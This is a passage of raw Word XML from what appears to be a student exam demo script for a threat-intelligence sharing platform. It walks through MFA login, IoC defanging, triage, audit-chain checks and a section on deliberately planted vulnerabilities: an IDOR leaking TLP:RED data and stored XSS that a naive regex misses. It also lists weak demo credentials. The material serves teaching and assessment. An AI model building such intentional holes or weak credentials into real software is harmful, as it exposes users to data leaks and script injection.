          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HTTP 200 OK text/plain response exposing all 5 security metrics: cti_http_requests_total, cti_failed_logins_total, cti_indicators_total, cti_audit_records_total, cti_process_uptime_seconds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot to Capture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Terminal output displaying standard Prometheus metrics exposition.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Exam Phase Mapping: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Phase 2 (REQ-F-07) &amp; Phase 15 (Security Monitoring)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>SECTION 4 — 15-MINUTE LIVE DEMONSTRATION SCRIPT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The following minute-by-minute script outlines the optimal presentation flow designed to highlight the platform's core security mechanisms, threat model countermeasures, and controlled vulnerability evidence.</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1872"/>
        <w:gridCol w:w="1872"/>
        <w:gridCol w:w="1872"/>
        <w:gridCol w:w="1872"/>
        <w:gridCol w:w="1872"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F1F5F9"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Time Window</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="F1F5F9"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Demonstration Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:fill="F1F5F9"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>What to Do</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F1F5F9"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>What to Say to Examiner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="F1F5F9"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Screenshot to Capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>00:00 - 01:30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>System Architecture &amp; Startup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Run 'npm start' in Terminal 1. Query 'curl /api/health' in Terminal 2. Open 'http://localhost:3000'.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>'Examiner, our CTI Sharing Platform is active with SQLite in WAL mode. Notice our /api/health probe confirms system readiness without leaking server headers.'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Terminal health response &amp; Dashboard homepage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>01:30 - 04:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Identity &amp; TOTP MFA (Screen 1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Select 'contributor_alex'. Enter 'Password123!'. Advance to Step 2. Enter TOTP '123456'. Show issued JWT.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>'We enforce defense-in-depth: 10-round salted Bcrypt hashing, constant-time dummy comparisons against user enumeration, and RFC 6238 TOTP MFA with a 30s drift window.'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Screen 1 Step 2 TOTP prompt &amp; header user chip.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>04:00 - 06:30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ingestion &amp; Defanging (Screen 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>In Screen 2, type IP '198.51.100.24' and domain 'https://c2.ru'. Submit IoC. Submit duplicate IoC.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>'We implement the Strategy Pattern in iocValidator.js. It canonicalizes observables and auto-defangs dots and protocols to protect analysts. It also enforces deduplication without database bloat.'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Screen 2 Live Defanging Preview box with bracketed dots.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>06:30 - 08:30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Triage Station &amp; TLP Barrier (Screen 3 &amp; 4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Switch to 'analyst_riya'. Open Screen 3. Review pending IoC, assign confidence 90, MITRE T1566, and approve. Open Screen 4 and fetch STIX feed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>'Contributors cannot publish directly; intelligence must be triaged by an Analyst with mandatory justification. Our STIX 2.1 feed applies server-side canAccessTLP filtering to exclude TLP:RED for consumers.'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Screen 3 Review Modal &amp; Screen 4 STIX 2.1 JSON bundle.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>08:30 - 10:30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Audit Chain &amp; Observability (Screen 4 &amp; CLI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Click 'Run Audit Chain Integrity Verification' on Screen 4. In Terminal 2, run 'node scripts/verify-audit-chain.js'. Query '/metrics'.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>'Our audit log implements continuous SHA-256 hash chaining back to Genesis. Any out-of-band database tampering breaks the hash chain and is immediately flagged by our offline verifier.'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Terminal verify-audit-chain.js output (STATUS: VERIFIED).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>10:30 - 13:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Vulnerability Demonstration (M11)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>In Terminal 2, run 'npm run test:vuln'. In browser console, show TLP:RED leak on /api/reports and unescaped HTML5 event handlers in /api/reports/:id.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>'In Milestone M11, we demonstrated two realistic weaknesses: (1) V02 IDOR on GET /api/reports/:id leaking TLP:RED data across tenant boundaries, and (2) V04 Stored XSS where naive regex misses HTML5 event handlers.'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
